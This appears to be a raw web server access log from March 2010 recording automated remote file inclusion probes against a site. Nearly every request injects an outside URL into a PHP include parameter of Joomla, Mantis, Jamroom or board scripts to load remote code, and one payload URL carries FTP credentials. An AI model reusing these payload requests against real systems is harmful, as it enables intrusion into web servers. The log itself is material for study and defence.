163.13.224.70 - - [05/Mar/2010:10:21:54 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:10:21:54 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:10:22:13 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:22:19 -0800] "GET /logs/access_100206.log//bbs////write_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.52.184.212 - - [05/Mar/2010:10:22:38 -0800] "GET /errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:22:47 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:22:47 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:22:47 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:22:58 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:10:26:06 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:10:26:06 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:10:26:06 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:10:26:22 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:26:53 -0800] "GET /logs/access_100212.log/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:26:53 -0800] "GET /logs/access_100215.log/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:27:46 -0800] "GET /logs/access_100224.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [05/Mar/2010:10:27:55 -0800] "GET /logs///errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.7.205.103 - - [05/Mar/2010:10:27:55 -0800] "GET /logs/access_100225.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:10:28:41 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:10:29:39 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://ztreno.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:30:22 -0800] "GET /e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:30:22 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:30:22 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:31:30 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:31:30 -0800] "GET /e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:31:30 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:31:40 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:31:41 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:31:41 -0800] "GET /logs/access_100209.log//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:31:49 -0800] "GET /logs/access_100201.log//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:31:56 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:29 -0800] "GET /logs/access_100203.log%20%20//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:29 -0800] "GET /bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:29 -0800] "GET /logs//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:32:46 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:56 -0800] "GET /bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:56 -0800] "GET /logs//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:32:56 -0800] "GET /logs/access_100203.log%20%20//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:33:22 -0800] "GET /logs/access_100130.log%20%20//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:33:51 -0800] "GET /logs/access_100130.log%20%20//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:34:32 -0800] "GET /logs//Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:34:32 -0800] "GET /logs/access_100204.log//Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:34:32 -0800] "GET /Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:01 -0800] "GET /logs//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:01 -0800] "GET /logs/access_100203.log//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:01 -0800] "GET /bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:17 -0800] "GET /logs/access_100203.log//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:17 -0800] "GET /bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:17 -0800] "GET /logs//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:27 -0800] "GET /logs/access_100130.log//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [05/Mar/2010:10:38:46 -0800] "GET /logs/access_100130.log//bbs/bbs//board_head.php?board_skin_path=http://auctionsworldwide.net//gsales//images/homeimg/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:01 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:01 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:10:39:06 -0800] "GET /logs/access_100130.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:10:39:06 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:10:39:06 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:10:40:15 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:38 -0800] "GET /logs/access_100213.log//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:38 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:38 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:55 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:55 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:40:55 -0800] "GET /logs/access_100213.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:42:14 -0800] "GET /logs/access_100209.log//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:43:00 -0800] "GET /logs/access_100204.log%20%20//Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:43:01 -0800] "GET /bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:43:06 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:43:06 -0800] "GET /logs/access_100203.log%20%20//bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:43:13 -0800] "GET /logs/access_100206.log%20%20//bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:43:17 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:43:17 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:43:17 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:43:27 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:43:31 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:43:50 -0800] "GET /logs/access_100209.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:43:50 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:44:50 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:10:44:52 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [05/Mar/2010:10:46:11 -0800] "GET /logs///errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:10:46:14 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:10:46:17 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:10:46:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:10:46:17 -0800] "GET /logs/access_100129.log//?_SERVER[DOCUMENT_ROOT]=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:46:37 -0800] "GET /logs/access_100217.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:47:03 -0800] "GET /logs/access_100217.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:47:05 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:10:47:11 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:50:16 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:50:16 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:50:16 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:10:51:47 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:10:51:47 -0800] "GET /logs/access_091220.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:10:51:47 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:52:34 -0800] "GET /logs////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:52:34 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:52:34 -0800] "GET ///delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:35 -0800] "GET /popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:35 -0800] "GET /logs/popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:35 -0800] "GET /logs/access_100210.log%20%20/popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:37 -0800] "GET /popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:37 -0800] "GET /logs/popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [05/Mar/2010:10:52:37 -0800] "GET /logs/access_100210.log%20%20/popular.skin.php?g4[path]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:52:47 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:10:52:50 -0800] "GET /logs/access_091121.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:53:19 -0800] "GET ///delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:53:19 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:53:19 -0800] "GET /logs////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:10:53:32 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:54:59 -0800] "GET /logs/access_100215.log/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:54:59 -0800] "GET /logs/access_100212.log/mantis/login_page.php?g_meta_include_file=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:55:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:55:08 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:55:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
